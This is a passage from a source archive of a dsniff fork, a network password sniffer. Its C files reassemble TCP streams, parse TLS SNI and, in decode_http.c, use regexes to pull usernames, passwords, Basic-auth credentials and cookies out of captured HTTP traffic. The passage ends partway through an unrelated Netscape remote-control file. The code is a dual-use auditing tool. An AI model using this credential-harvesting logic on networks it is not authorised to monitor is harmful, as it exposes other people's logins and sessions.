} hackerschoice-dsniff-a17510d/decode_http.c0000664000175000017500000002100415105626144020435 0ustar epsilonepsilon/* * decode_http.c * * Hypertext Transfer Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_http.c,v 1.17 2001/03/15 08:32:59 dugsong Exp $ */ #include "common.h" #include #include #include #include #include #include #include #include #include "options.h" #include "base64.h" #include "buf.h" #include "decode.h" #include "crc32.h" #define USER_REGEX ".*account.*|.*acct.*|.*domain.*|.*login.*|" \ ".*member.*|.*user.*|.*name|.*email|.*_id|" \ "id|uid|mn|mailaddress" #define PASS_REGEX ".*pass.*|.*pw|pw.*|additional_info" #define REGEX_FLAGS (REG_EXTENDED | REG_ICASE | REG_NOSUB) static regex_t *user_regex, *pass_regex; extern struct _dc_meta dc_meta; static int grep_pquery_auth(char *buf) { if (buf == NULL) return 0; if (regexec(pass_regex, buf, 0, NULL, 0) == 0) return 1; if (regexec(user_regex, buf, 0, NULL, 0) == 0) return 1; return 0; } static int grep_gquery_auth(char *buf) { char *p, *q, *tmp; int user, pass; if (buf == NULL) return 0; user = pass = 0; if ((tmp = strdup(buf)) == NULL) return (0); for (p = strtok(tmp, "&"); p != NULL; p = strtok(NULL, "&")) { if ((q = strchr(p, '=')) == NULL) continue; *q = '\0'; if (!user) { if (regexec(user_regex, p, 0, NULL, 0) == 0) { user = 1; continue; } } if (!pass) { if (regexec(pass_regex, p, 0, NULL, 0) == 0) pass = 1; } if (user && pass) break; } free(tmp); return (user && pass); } // Used for AUTH requests only (directories, not files, are authorized) static char * http_req_dirname(char *req) { char *uri, *vers; if ((uri = strchr(req, ' ')) == NULL) return (req); if ((vers = strrchr(uri, ' ')) == uri) { vers = NULL; // "GET /file" } else if (vers[-1] == '/') { return (req); // "GET /file/ HTTP/1.1" } else *vers++ = '\0'; // "GET /file HTTP/1.1" strcpy(req, dirname(req)); strcat(req, "/"); if (vers) { strcat(req, " "); strcat(req, vers); } return (req); } int decode_http(u_char *buf, int len, u_char *obuf, int olen) { struct buf *msg, inbuf, outbuf; char *p, *req, *auth, *pauth, *gquery, *pquery, *host, *cookie, *agent, *location = NULL, *http_resp = NULL; int i; int is_http_ok = 1; // default assume OK char dom[1024]; char *type; char *uri_prot; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (user_regex == NULL || pass_regex == NULL) { if ((user_regex = malloc(sizeof(*user_regex))) == NULL || (pass_regex = malloc(sizeof(*pass_regex))) == NULL) err(1, "malloc"); if (regcomp(user_regex, USER_REGEX, REGEX_FLAGS) || regcomp(pass_regex, PASS_REGEX, REGEX_FLAGS)) errx(1, "regcomp failed"); } // Check SERVER's answer if ((dc_meta.rbuf) && (p = strtok(dc_meta.rbuf, "\r\n")) && (strlen(p) > 12)) { http_resp = p + 9; if (p[9] != '2') is_http_ok = 0; if (p[9] == '3') { while ((p = strtok(NULL, "\r\n")) != NULL) { if (strncasecmp(p, "Location: ", 10) != 0) continue; if (strstr(p + 10, "https://") != NULL) { location = p + 10; dc_meta.is_hot = 1; // http -> https redirects can be intercepted. } break; } } } // Parse CLIENT's submission while ((i = buf_index(&inbuf, "\r\n\r\n", 4)) >= 0) { int is_json = 0; int is_form = 0; int cont_len = 0; int is_hot = 0; int is_query_hot = 0; msg = buf_tok(&inbuf, NULL, i); msg->base[msg->end] = '\0'; buf_skip(&inbuf, 4); if ((req = strtok(buf_ptr(msg), "\r\n")) == NULL) continue; if (strncmp(req, "GET ", 4) == 0) { type = "GET"; uri_prot = req + 4; } else if (strncmp(req, "POST ", 5) == 0) { type = "POST"; uri_prot = req + 5; } else if (strncmp(req, "CONNECT ", 8) == 0) { type = "CONNECT"; uri_prot = req + 8; } else continue; auth = pauth = gquery = pquery = host = cookie = agent = NULL; if ((gquery = strchr(uri_prot, '?')) != NULL) { gquery++; } while ((p = strtok(NULL, "\r\n")) != NULL) { if (strncasecmp(p, "Authorization: Basic ", 21) == 0) { auth = p; is_hot = 1; } else if (strncasecmp(p, "Proxy-authorization: Basic ", 27) == 0) { pauth = p; is_hot = 1; } else if (strncasecmp(p, "Host: ", 6) == 0) { host = p + 6; } else if (strncasecmp(p, "Cookie: ", 8) == 0) { cookie = p + 8; // Cookies are alwasy "hot" is_hot = 1; } else if (strncasecmp(p, "User-Agent: ", 12) == 0) { agent = p; } else if (type[0] == 'P') { // POST if (strncasecmp(p, "Content-type: ", 14) == 0) { if (strncmp(p + 14, "application/x-www-form-urlencoded", 33) == 0) is_form = 1; else if (strncmp(p + 14, "application/json", 16) == 0) is_json = 1; } else if (strncasecmp(p, "Content-length: ", 16) == 0) { p += 16; cont_len = atoi(p); } } } // while() // HERE: Header done. if (cont_len > 0) { if ((msg = buf_tok(&inbuf, NULL, cont_len)) != NULL) { msg->base[msg->end] = '\0'; pquery = buf_ptr(msg); cont_len = msg->end; // in case cont_len was longer than sniffed data. } else cont_len = 0; } // Check if queries contain keywords ['password' etc] if (grep_gquery_auth(gquery)) is_query_hot++; if (grep_pquery_auth(pquery)) is_query_hot++; is_hot += is_query_hot; if (Opt_verbose || is_hot || location) { if (buf_tell(&outbuf) > 0) buf_putf(&outbuf, "\n\n"); if (type[0] == 'G' && auth) { req = http_req_dirname(req); } if (Opt_color) { if (gquery) { *(gquery - 1) = '\0'; buf_putf(&outbuf, CB"%s"CDC" %s"CN"?%s", type, uri_prot, gquery); *(gquery -1) = '?'; } else { if (p = strchr(uri_prot, ' ')) { *p = '\0'; buf_putf(&outbuf, CB"%s"CDC" %s"CN" %s", type, uri_prot, p+1); *p = ' '; } else buf_putf(&outbuf, CB"%s"CDC" %s"CN, type, uri_prot); } } else buf_putf(&outbuf, "%s", req); if (http_resp) buf_putf(&outbuf, " >>> %s", http_resp); if (is_hot) dc_meta.is_hot = 1; // DUP check up to '?' // Anti-Fuzzing: Ignore requests to same host with different 'req' but log if Cookie/Auth is supplied // On "-vv" add URI to CRC (and thus log different URIs) if ((!Opt_show_dups) && (is_http_ok) && ((is_hot) || (Opt_verbose >= 2)) ) { // HERE: Do NOT show duplicates. if (gquery) dc_update(&dc_meta, req, gquery - 1 - req); // Only dup-check up to "?" else dc_update(&dc_meta, req, strlen(req)); } if (host) { if (Opt_color) buf_putf(&outbuf, "\n"CDY"Host"CN": %s", color_domain(dom, sizeof dom, host)); else buf_putf(&outbuf, "\nHost: %s", host); dc_update(&dc_meta, host, strlen(host)); } if (location) { if (Opt_color) buf_putf(&outbuf, "\n"CDY"Location"CN": "CDR"%s"CN, location); else buf_putf(&outbuf, "\nLocation: %s", location); location = NULL; } if (agent) buf_putf(&outbuf, "\n%s", agent); if (cookie) { if (Opt_color) buf_putf(&outbuf, "\n"CDR"Cookie"CN": %s", cookie); else buf_putf(&outbuf, "\nCookie: %s", cookie); // Dont catch 'expires=<>' timer (limit to 64). FIXME: Should really disect the cookie and match for 'expires=' // Prevent Fuzzing from flooding our log => Use max of 19 dubdb-slots if (!Opt_show_dups) { uint8_t fuzz = crc32(cookie, MIN(64, strlen(cookie))) % 19; dc_update(&dc_meta, &fuzz, 1); } } if (pauth) { buf_putf(&outbuf, "\n%s", pauth); dc_update(&dc_meta, pauth + 27, strlen(pauth + 27)); p = pauth + 27; i = base64_pton(p, p, strlen(p)); p[i] = '\0'; buf_putf(&outbuf, " [%s]", p); } if (auth) { buf_putf(&outbuf, "\n%s", auth); dc_update(&dc_meta, auth + 21, strlen(auth + 21)); p = auth + 21; i = base64_pton(p, p, strlen(p)); p[i] = '\0'; buf_putf(&outbuf, " [%s]", p); } if (type[0] == 'P' && is_query_hot) { // dc_update(&dc_meta, "AUTHDUMMY", 1); // XXX HACK to log any POST req. only ONCE. if (is_form) { // Display decoded variables p = gquery; char *n; while ((n = strchr(p, '&'))) { *n = '\0'; buf_putf(&outbuf, "\n%s", p); p = n + 1; } buf_putf(&outbuf, "\n%s", p); // remainder } else if (is_json || Opt_verbose) { buf_putf(&outbuf, "\n%s", pquery); // dc_update(&dc_meta, pquery, cont_len); } } } } //while ((i = buf_index(&inbuf, "\r\n\r\n", 4)) >= 0) buf_end(&outbuf); // HTTP response was not 2xx. Only log if Cookie/Auth was found. if (dc_meta.is_hot || (Opt_verbose && is_http_ok)) return buf_len(&outbuf); return 0; } hackerschoice-dsniff-a17510d/dsniff_services.h0000664000175000017500000000700515105626144021341 0ustar epsilonepsilon //grep -v ^# dsniff.services | while read -r x; do s="${x##*$'\t'}"; echo -e '{"'"${x%%$'\t'*}"'"'", ${s%%\/*}, DSNIFF_SERVICE_${s##*/}},"; done | column -t >>dsniff_services.h struct _ds_service { char *name; int port; char *proto; }; #define DSNIFF_SERVICE_tcp "tcp" #define DSNIFF_SERVICE_ip "ip" #define DSNIFF_SERVICE_udp "udp" #define DSNIFF_SERVICE_rpc "rpc" static struct _ds_service dsx[] = { {"ftp", 21, DSNIFF_SERVICE_tcp}, {"ssh", 22, DSNIFF_SERVICE_tcp}, {"telnet", 23, DSNIFF_SERVICE_tcp}, {"smtp", 25, DSNIFF_SERVICE_tcp}, {"pptp", 47, DSNIFF_SERVICE_ip}, {"http", 80, DSNIFF_SERVICE_tcp}, {"ospf", 89, DSNIFF_SERVICE_ip}, {"http", 98, DSNIFF_SERVICE_tcp}, {"poppass", 106, DSNIFF_SERVICE_tcp}, {"pop2", 109, DSNIFF_SERVICE_tcp}, {"pop3", 110, DSNIFF_SERVICE_tcp}, {"portmap", 111, DSNIFF_SERVICE_tcp}, {"portmap", -111, DSNIFF_SERVICE_tcp}, {"portmap", 111, DSNIFF_SERVICE_udp}, {"portmap", -111, DSNIFF_SERVICE_udp}, {"vrrp", 112, DSNIFF_SERVICE_ip}, {"nntp", 119, DSNIFF_SERVICE_tcp}, {"smb", 139, DSNIFF_SERVICE_tcp}, {"imap", 143, DSNIFF_SERVICE_tcp}, {"snmp", 161, DSNIFF_SERVICE_udp}, {"imap", 220, DSNIFF_SERVICE_tcp}, {"telnet", 261, DSNIFF_SERVICE_tcp}, {"ldap", 389, DSNIFF_SERVICE_tcp}, {"mmxp", 417, DSNIFF_SERVICE_tcp}, {"mmxp", 417, DSNIFF_SERVICE_udp}, {"https", 443, DSNIFF_SERVICE_tcp}, {"rlogin", 512, DSNIFF_SERVICE_tcp}, {"rlogin", 513, DSNIFF_SERVICE_tcp}, {"rlogin", 514, DSNIFF_SERVICE_tcp}, {"rip", 520, DSNIFF_SERVICE_udp}, {"smtp", 587, DSNIFF_SERVICE_tcp}, {"socks", 1080, DSNIFF_SERVICE_tcp}, {"tds", 1433, DSNIFF_SERVICE_tcp}, {"tds", 1433, DSNIFF_SERVICE_udp}, {"citrix", 1494, DSNIFF_SERVICE_tcp}, {"oracle", 1521, DSNIFF_SERVICE_tcp}, {"oracle", 1526, DSNIFF_SERVICE_tcp}, {"sniffer", 2001, DSNIFF_SERVICE_udp}, {"cvs", 2401, DSNIFF_SERVICE_tcp}, {"mmxp", 2417, DSNIFF_SERVICE_tcp}, {"mmxp", 2417, DSNIFF_SERVICE_udp}, {"tds", 2638, DSNIFF_SERVICE_tcp}, {"http", 3128, DSNIFF_SERVICE_tcp}, //{"icq", 4000, DSNIFF_SERVICE_udp}, //{"napster", 4444, DSNIFF_SERVICE_tcp}, // {"aim", 5190, DSNIFF_SERVICE_tcp}, {"postgresql", 5432, DSNIFF_SERVICE_tcp}, // {"napster", 5555, DSNIFF_SERVICE_tcp}, {"pcanywhere", 5631, DSNIFF_SERVICE_tcp}, {"x11", 6000, DSNIFF_SERVICE_tcp}, {"x11", 6001, DSNIFF_SERVICE_tcp}, {"x11", 6002, DSNIFF_SERVICE_tcp}, {"x11", 6003, DSNIFF_SERVICE_tcp}, {"x11", 6004, DSNIFF_SERVICE_tcp}, {"x11", 6005, DSNIFF_SERVICE_tcp}, // {"napster", 6666, DSNIFF_SERVICE_tcp}, {"irc", 6667, DSNIFF_SERVICE_tcp}, {"irc", 6668, DSNIFF_SERVICE_tcp}, {"irc", 6669, DSNIFF_SERVICE_tcp}, {"tds", 7599, DSNIFF_SERVICE_tcp}, // {"napster", 7777, DSNIFF_SERVICE_tcp}, {"http", 8080, DSNIFF_SERVICE_tcp}, // {"napster", 8888, DSNIFF_SERVICE_tcp}, // {"aim", 9898, DSNIFF_SERVICE_tcp}, {"pcanywhere", 65301, DSNIFF_SERVICE_tcp}, {"mountd", 100005, DSNIFF_SERVICE_rpc}, {"ypserv", 100004, DSNIFF_SERVICE_rpc}, {"yppasswd", 100009, DSNIFF_SERVICE_rpc} };hackerschoice-dsniff-a17510d/record.c0000664000175000017500000001336015105626144017437 0ustar epsilonepsilon/* * record.c * * Copyright (c) 2000 Dug Song * * $Id: record.c,v 1.10 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #define _GNU_SOURCE #include #include #include #include #include #include #include #include #ifdef WITH_BERKELEY_DB #ifdef HAVE_DB_185_H #define DB_LIBRARY_COMPATIBILITY_API #include #elif HAVE_DB_H #include #endif #endif #include #include "options.h" #include "record.h" #include "decode.h" #include "crc32.h" struct rec { time_t time; in_addr_t src; in_addr_t dst; u_int proto; u_short sport; u_short dport; struct netobj name; struct netobj data; }; extern struct _dc_meta dc_meta; uint32_t dup_table[16 * 1024]; size_t dup_idx; static bool dupdb_hit(uint32_t crc) { if (memmem(dup_table, sizeof dup_table, &crc, sizeof crc) == NULL) return false; // FALSE return true; } static void dupdb_add(uint32_t crc) { dup_table[dup_idx++] = crc; dup_idx = dup_idx % (sizeof dup_table / sizeof *dup_table); } static bool dupdb_is_new(uint32_t crc) { if (dupdb_hit(crc)) return false; // exists already dupdb_add(crc); return true; } #ifdef WITH_BERKELEY_DB static DB *db; static int xdr_rec(XDR *xdrs, struct rec *rec) { if (xdr_u_long(xdrs, (u_long *)&rec->time) && xdr_u_long(xdrs, (u_long *)&rec->src) && xdr_u_long(xdrs, (u_long *)&rec->dst) && xdr_u_int(xdrs, &rec->proto) && xdr_u_short(xdrs, &rec->sport) && xdr_u_short(xdrs, &rec->dport) && xdr_netobj(xdrs, &rec->name) && xdr_netobj(xdrs, &rec->data)) { return (1); } return (0); } #endif static void record_print(struct rec *rec) { struct tm *tm; char *srcp, *dstp, *protop, tstr[64 + 24], spstr[8], dpstr[8]; struct protoent *pr; char srcbuf[128], dstbuf[128]; tm = localtime(&rec->time); if (Opt_color) strftime(tstr, sizeof(tstr), CW CF"%x "CDW CF"%X", tm); else strftime(tstr, sizeof(tstr), "%x %X", tm); if ((!Opt_color) || (Opt_dns)) { srcp = libnet_addr2name4(rec->src, Opt_dns); dstp = libnet_addr2name4(rec->dst, Opt_dns); } else { srcp = srcbuf; dstp = dstbuf; color_ip(srcbuf, sizeof srcbuf, rec->src); color_ip(dstbuf, sizeof dstbuf, rec->dst); } if ((pr = getprotobynumber(rec->proto)) == NULL) protop = "unknown"; else protop = pr->p_name; snprintf(spstr, sizeof(spstr), "%d", rec->sport); snprintf(dpstr, sizeof(dpstr), "%d", rec->dport); if (Opt_color) { char *c_proto = CDB; if (rec->proto == IPPROTO_TCP) c_proto = CDG; else if (rec->proto == IPPROTO_UDP) c_proto = CDC; printf(CW">>>>> %s %s%s"CN" %s%s%s "CF"->"CN" %s%s%s (%.*s)", tstr, c_proto, protop, srcp, rec->sport ? ":" : "", rec->sport ? spstr : "", dstp, rec->dport ? ":" : "", rec->dport ? dpstr : "", (int) rec->name.n_len, rec->name.n_bytes); } else { printf(">>>>> %s %s %s%s%s -> %s%s%s (%.*s)", tstr, protop, srcp, rec->sport ? ":" : "", rec->sport ? spstr : "", dstp, rec->dport ? ":" : "", rec->dport ? dpstr : "", (int) rec->name.n_len, rec->name.n_bytes); } if (dc_meta.is_hot) { if (Opt_color) printf(" "CR"[HOTHOT]\n"CN); else printf(" [HOTHOT]\n"); } else printf("\n"); fwrite(rec->data.n_bytes, 1, rec->data.n_len, stdout); printf("\n"); fflush(stdout); } #ifdef WITH_BERKELEY_DB static DBT * record_hash(struct rec *rec) { static DBT key; static u_char hash[16]; MD5_CTX ctx; /* Unique key: src/dst IPs, decode type, decode data. */ MD5Init(&ctx); MD5Update(&ctx, (u_char *) &rec->src, sizeof(rec->src)); MD5Update(&ctx, (u_char *) &rec->dst, sizeof(rec->dst)); MD5Update(&ctx, rec->name.n_bytes, rec->name.n_len); MD5Update(&ctx, rec->data.n_bytes, rec->data.n_len); MD5Final(hash, &ctx); key.data = hash; key.size = sizeof(hash); return (&key); } #endif static int record_save(struct rec *rec) { #ifdef WITH_BERKELEY_DB DBT *key, data; XDR xdrs; u_char buf[2048]; xdrmem_create(&xdrs, buf, sizeof(buf), XDR_ENCODE); if (!xdr_rec(&xdrs, rec)) return (0); data.data = buf; data.size = xdr_getpos(&xdrs); xdr_destroy(&xdrs); key = record_hash(rec); if (db->put(db, key, &data, R_NOOVERWRITE) == 0) db->sync(db, 0); #endif return (1); } void record_dump(void) { #ifdef WITH_BERKELEY_DB DBT key, data; XDR xdrs; struct rec rec; while (db->seq(db, &key, &data, R_NEXT) == 0) { memset(&rec, 0, sizeof(rec)); xdrmem_create(&xdrs, data.data, data.size, XDR_DECODE); if (xdr_rec(&xdrs, &rec)) { record_print(&rec); } xdr_destroy(&xdrs); } #endif } int record_init(char *file) { #ifdef WITH_BERKELEY_DB int flags, mode; if (Opt_read) { flags = O_RDONLY; mode = 0; } else { flags = O_RDWR|O_CREAT; mode = S_IRUSR|S_IWUSR; } if ((db = dbopen(file, flags, mode, DB_BTREE, NULL)) == NULL) return (0); #endif return (1); } int record(in_addr_t src, in_addr_t dst, int proto, u_short sport, u_short dport, char *name, u_char *buf, int len) { struct rec rec; uint32_t crc; if (!Opt_show_dups) { // Check for duplicates. crc = dc_meta.crc; // Add entire buffer unless decoding function already added 'uniq' items. if (crc == CRC32_INITIAL_STATE) crc = crc32_update(buf, len, crc); crc = crc32_update(&src, sizeof src, crc); crc = crc32_update(&dst, sizeof dst, crc); crc = crc32_update(&dport, sizeof dport, crc); if (!dupdb_is_new(crc)) return 1; } rec.time = time(NULL); rec.src = src; rec.dst = dst; rec.proto = proto; rec.sport = sport; rec.dport = dport; rec.name.n_bytes = name; rec.name.n_len = strlen(name); rec.data.n_bytes = buf; rec.data.n_len = len; if (!Opt_read && !Opt_write) record_print(&rec); record_save(&rec); return (1); } void record_close(void) { #ifdef WITH_BERKELEY_DB db->close(db); #endif } hackerschoice-dsniff-a17510d/tcp_raw.c0000664000175000017500000001154415105626144017622 0ustar epsilonepsilon/* * tcp_raw.c * * Copyright (c) 2000 Dug Song * * $Id: tcp_raw.c,v 1.10 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include "options.h" #include "tcp_raw.h" struct tha { in_addr_t src; in_addr_t dst; u_short port; }; struct tcp_seg { u_int32_t seq; u_char *data; int len; }; struct tcp_conn { struct tha tha; time_t mtime; struct tcp_seg *seg; int segcnt; int segmax; struct tcp_conn *next; }; #define TCP_TIMEOUT 60 #define TCP_HASHSIZE 919 static struct tcp_conn conntab[TCP_HASHSIZE]; static int tcp_seg_compare(const void *a, const void *b) { struct tcp_seg *sa, *sb; sa = (struct tcp_seg *) a; sb = (struct tcp_seg *) b; if (sa->seq < sb->seq) return (-1); else if (sa->seq > sb->seq) return (1); else return (0); } static void tcp_raw_delete(struct tcp_conn *conn) { struct tcp_conn *hold; int i; if (conn->next != NULL) { for (i = 0; i < conn->segcnt; i++) { if (conn->seg[i].data) free(conn->seg[i].data); } free(conn->seg); conn->seg = NULL; conn->segcnt = conn->segmax = 0; if (conn->next->next != NULL) { hold = conn->next; *conn = *conn->next; free(hold); } else { free(conn->next); conn->next = NULL; } } } static struct iovec * tcp_raw_reassemble(struct tcp_conn *conn, int minlen) { struct iovec *iov; int i, len; len = 0; for (i = 0; i < conn->segcnt; i++) len += conn->seg[i].len; if (len < minlen) return (NULL); if ((iov = (struct iovec *) malloc(sizeof(*iov))) == NULL) err(1, "tcp_raw_reassemble: malloc"); if ((iov->iov_base = (u_char *) malloc(len)) == NULL) err(1, "tcp_raw_reassemble: malloc"); iov->iov_len = 0; qsort(conn->seg, conn->segcnt, sizeof(*conn->seg), tcp_seg_compare); for (i = 0; i < conn->segcnt; i++) { len = conn->seg[i].len; memcpy(iov->iov_base + iov->iov_len, conn->seg[i].data, len); iov->iov_len += len; } return (iov); } struct iovec * tcp_raw_input(struct libnet_ipv4_hdr *ip, struct libnet_tcp_hdr *tcp, int len) { struct tha tha; struct tcp_conn *conn; struct tcp_seg seg; struct iovec *iov; // u_short cksum; u_char *buf; int tcp_hl = tcp->th_off * 4; /* Verify TCP checksum. */ // FIXME-2024 chksum is always bad due to checksum offloading. // cksum = tcp->th_sum; // libnet_do_checksum(NULL, (u_char *) ip, IPPROTO_TCP, len); // if (cksum != tcp->th_sum) // return (NULL); tha.src = ip->ip_src.s_addr; tha.dst = ip->ip_dst.s_addr; tha.port = ntohs(tcp->th_sport) << 16 | ntohs(tcp->th_dport); buf = (u_char *)tcp + tcp_hl; len -= tcp_hl; iov = NULL; /* Find half-duplex stream associated with this segment. */ for (conn = &conntab[tha.port % TCP_HASHSIZE]; conn->next != NULL; conn = conn->next) { if (memcmp((char *)&tha, (char *)&conn->tha, sizeof(tha)) == 0) break; } /* Process by TCP flags. */ if (conn->next == NULL) { if (tcp->th_flags & TH_SYN) { if (conn->next == NULL && (conn->next = (struct tcp_conn *) calloc(1, sizeof(*conn))) == NULL) { err(1, "tcp_raw_input: calloc"); } conn->tha = tha; if (conn->seg == NULL && (conn->seg = (struct tcp_seg *) malloc(sizeof(seg) * 128)) == NULL) { err(1, "tcp_raw_input: malloc"); } conn->segmax = 128; } } else if (tcp->th_flags & TH_FIN || tcp->th_flags & TH_RST) { iov = tcp_raw_reassemble(conn, 1); } else if (tcp->th_flags & TH_ACK && len > 0) { seg.seq = ntohl(tcp->th_seq); if (bsearch(&seg, conn->seg, conn->segcnt, sizeof(seg), tcp_seg_compare) == NULL) { if ((seg.data = (u_char *) malloc(len)) == NULL) err(1, "tcp_raw_input: malloc"); memcpy(seg.data, buf, len); seg.len = len; if (conn->segcnt == conn->segmax) { if ((conn->seg = (struct tcp_seg *) realloc(conn->seg, (conn->segmax * 2) * sizeof(seg))) == NULL) err(1, "tcp_raw_input: realloc"); conn->segmax *= 2; } conn->seg[conn->segcnt++] = seg; iov = tcp_raw_reassemble(conn, Opt_snaplen); } } conn->mtime = time(NULL); /* If we successfully reassembled the stream, delete its entry. */ if (iov != NULL) { tcp_raw_delete(conn); } return (iov); } void tcp_raw_timeout(int timeout, tcp_raw_callback_t callback) { struct tcp_conn *conn; struct iovec *iov; time_t now; int i; now = time(NULL); for (i = 0; i < TCP_HASHSIZE; i++) { for (conn = &conntab[i]; conn != NULL && conn->next != NULL; conn = conn->next) { if (now - conn->mtime > timeout) { iov = tcp_raw_reassemble(conn, 1); if (iov != NULL) { callback(conn->tha.src, conn->tha.dst, conn->tha.port >> 16, conn->tha.port & 0xffff, iov->iov_base, iov->iov_len); free(iov->iov_base); free(iov); } tcp_raw_delete(conn); } } } } hackerschoice-dsniff-a17510d/hex.h0000664000175000017500000000053015105626144016745 0ustar epsilonepsilon/* * hex.h * * Hexadecimal conversion routines. * * Copyright (c) 2000 Dug Song * * $Id: hex.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef HEX_H #define HEX_H int hex_decode(char *src, int srclen, u_char *buf, int len); void hex_print(const u_char *buf, int len, int offset); #endif /* HEX_H */ hackerschoice-dsniff-a17510d/decode_sni.c0000664000175000017500000000531615105626144020257 0ustar epsilonepsilon#include "config.h" #include #include #include #include #include #include #include #include #include "options.h" #include "decode.h" extern struct _dc_meta dc_meta; struct tls_hdr { uint8_t proto; uint16_t vers; uint16_t len; } __attribute__((packed)); struct tls_ch { uint8_t type; uint8_t len[3]; uint16_t version; /// 03 03 for TLS 1.2 and TLS 1.3 uint8_t random[32]; uint8_t sid_len; } __attribute__((packed)); struct tls_ex { uint16_t type; uint16_t len; } __attribute__((packed)); int decode_sni(u_char *buf, int len, u_char *obuf, int olen) { u_char *end = buf + len; u_char *ptr = buf; struct tls_hdr *t = (struct tls_hdr *)buf; struct tls_ch *ch; uint16_t hls; uint16_t type; u_char *str; char dom[1024]; if (!Opt_verbose) return 0; if (len <= sizeof (struct tls_hdr) + sizeof (struct tls_ch) /* + sid_len */ + sizeof (struct tls_ex)) return 0; memcpy(&hls, &t->len, 2); hls = ntohs(hls); memset(&t->len, 0, 2); if (memcmp(buf, "\x16\x03\x01\x00\x00\x01", 6) != 0) return 0; // Skip TLS header ptr += sizeof *t; if (end - ptr < sizeof *ch) return 0; ch = (struct tls_ch *)ptr; // Skip fixed ClientHelo if (ptr[5] != 0x03) // ch->verison[1] return 0; ptr += sizeof *ch; ptr += ch->sid_len; // Skip Session-ID if (ptr >= end) return 0; memcpy(&hls, ptr, 2); hls = ntohs(hls); ptr += hls + 2; // Skip length + Cipher Suites if (ptr >= end) return 0; ptr += (ptr[0] + 1); // Skip length + Compression Methods if (ptr + 2 >= end) return 0; memcpy(&hls, ptr, 2); hls = ntohs(hls); ptr += 2; // Ignore garbage after extensions (should not be any) if (ptr + hls < end) end = ptr + hls; // Iterate through all TLS extensions until we find SNI. while (1) { if (ptr + sizeof (struct tls_ex) + 2 /* SNI List Length */ + 1 /* SNI Type */ >= end) goto err; memcpy(&type, ptr, 2); type = htons(type); if (type != 0) { memcpy(&hls, ptr + 2, 2); hls = htons(hls); ptr += sizeof (struct tls_ex) + hls; continue; } // SNI ptr += sizeof (struct tls_ex); ptr += 2; // List Length. if (ptr >= end) goto err; if (*ptr != 0x00) goto err; ptr += 1; // SN Type. if (ptr + 2 >= end) goto err; memcpy(&hls, ptr, 2); hls = htons(hls); ptr += 2; // SN Length if (ptr + hls + 1 >= end) // SNI is never the last. Make sure there is \0 for the \0. goto err; str = ascii_string(ptr, hls + 1); if (Opt_color) { snprintf(obuf, olen, CDY"SNI"CN": %s", color_domain(dom, sizeof dom, str)); } else snprintf(obuf, olen, "SNI: %s", str); break; } return (strlen(obuf)); err: if (Opt_debug) warnx("TLS 1.2/1.3 without SNI"); return 0; } hackerschoice-dsniff-a17510d/remote.c0000664000175000017500000004424215105626144017457 0ustar epsilonepsilon/* -*- Mode:C; tab-width: 8 -*- * remote.c --- remote control of Netscape Navigator for Unix. * version 1.1.3, for Netscape Navigator 1.1 and newer. * * Copyright © 1996 Netscape Communications Corporation, all rights reserved. * Created: Jamie Zawinski , 24-Dec-94. * * Permission to use, copy, modify, distribute, and sell this software and its * documentation for any purpose is hereby granted without fee, provided that * the above copyright notice appear in all copies and that both that * copyright notice and this permission notice appear in supporting * documentation. No representations are made about the suitability of this * software for any purpose. It is provided "as is" without express or * implied warranty. * * To compile: * * cc -o netscape-remote remote.c -DSTANDALONE -lXmu -lX11 * * To use: * * netscape-remote -help * * Documentation for the protocol which this code implements may be found at: * * http://home.netscape.com/newsref/std/x-remote.html * * Bugs and commentary to x_cbug@netscape.com. */ #include #include #include #include #include #include #include /* for XmuClientWindow() */ /* vroot.h is a header file which lets a client get along with `virtual root' window managers like swm, tvtwm, olvwm, etc. If you don't have this header file, you can find it at "http://home.netscape.com/newsref/std/vroot.h". If you don't care about supporting virtual root window managers, you can comment this line out. */ #include "vroot.h" #ifdef STANDALONE static const char *progname = 0; static const char *expected_mozilla_version = "1.1"; #else /* !STANDALONE */ extern const char *progname; extern const char *expected_mozilla_version; #endif /* !STANDALONE */ #define MOZILLA_VERSION_PROP "_MOZILLA_VERSION" #define MOZILLA_LOCK_PROP "_MOZILLA_LOCK" #define MOZILLA_COMMAND_PROP "_MOZILLA_COMMAND" #define MOZILLA_RESPONSE_PROP "_MOZILLA_RESPONSE" static Atom XA_MOZILLA_VERSION = 0; static Atom XA_MOZILLA_LOCK = 0; static Atom XA_MOZILLA_COMMAND = 0; static Atom XA_MOZILLA_RESPONSE = 0; static void mozilla_remote_init_atoms (Display *dpy) { if (! XA_MOZILLA_VERSION) XA_MOZILLA_VERSION = XInternAtom (dpy, MOZILLA_VERSION_PROP, False); if (! XA_MOZILLA_LOCK) XA_MOZILLA_LOCK = XInternAtom (dpy, MOZILLA_LOCK_PROP, False); if (! XA_MOZILLA_COMMAND) XA_MOZILLA_COMMAND = XInternAtom (dpy, MOZILLA_COMMAND_PROP, False); if (! XA_MOZILLA_RESPONSE) XA_MOZILLA_RESPONSE = XInternAtom (dpy, MOZILLA_RESPONSE_PROP, False); } static Window mozilla_remote_find_window (Display *dpy) { int i; Window root = RootWindowOfScreen (DefaultScreenOfDisplay (dpy)); Window root2, parent, *kids; unsigned int nkids; Window result = 0; Window tenative = 0; unsigned char *tenative_version = 0; if (! XQueryTree (dpy, root, &root2, &parent, &kids, &nkids)) { fprintf (stderr, "%s: XQueryTree failed on display %s\n", progname, DisplayString (dpy)); exit (2); } /* root != root2 is possible with virtual root WMs. */ if (! (kids && nkids)) { fprintf (stderr, "%s: root window has no children on display %s\n", progname, DisplayString (dpy)); exit (2); } for (i = nkids-1; i >= 0; i--) { Atom type; int format, status; unsigned long nitems, bytesafter; unsigned char *version = 0; Window w; w = XmuClientWindow (dpy, kids[i]); status = XGetWindowProperty (dpy, w, XA_MOZILLA_VERSION, 0, (65536 / sizeof (long)), False, XA_STRING, &type, &format, &nitems, &bytesafter, &version); if (! version) continue; if (strcmp ((char *) version, expected_mozilla_version) && !tenative) { tenative = w; tenative_version = version; continue; } XFree (version); if (status == Success && type != None) { result = w; break; } } if (result && tenative) { fprintf (stderr, "%s: warning: both version %s (0x%x) and version\n" "\t%s (0x%x) are running. Using version %s.\n", progname, tenative_version, (unsigned int) tenative, expected_mozilla_version, (unsigned int) result, expected_mozilla_version); XFree (tenative_version); return result; } else if (tenative) { #if 0 fprintf (stderr, "%s: warning: 